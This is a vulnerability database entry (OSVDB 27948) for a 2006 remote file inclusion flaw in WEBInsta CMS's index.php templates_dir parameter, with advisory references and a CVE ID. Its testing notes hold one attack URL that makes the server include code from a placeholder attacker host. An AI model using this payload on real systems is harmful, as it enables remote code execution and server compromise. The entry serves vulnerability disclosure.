WEBInsta CMS index.php templates_dir Variable Remote File Inclusion

2006-08-13T03:49:28
ID OSVDB:27948
Type osvdb
Reporter OSVDB
Modified 2006-08-13T03:49:28

Description

Manual Testing Notes

http://[target]/[webinstacms_path]/index.php?templates_dir=http://[attacker]/evil?

References:

Vendor URL: http://www.webinsta.com/cms.php Secunia Advisory ID:21463 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0260.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0020.html Keyword: ECHO_ADV_45$2006 FrSIRT Advisory: ADV-2006-3276 CVE-2006-4196 Bugtraq ID: 19489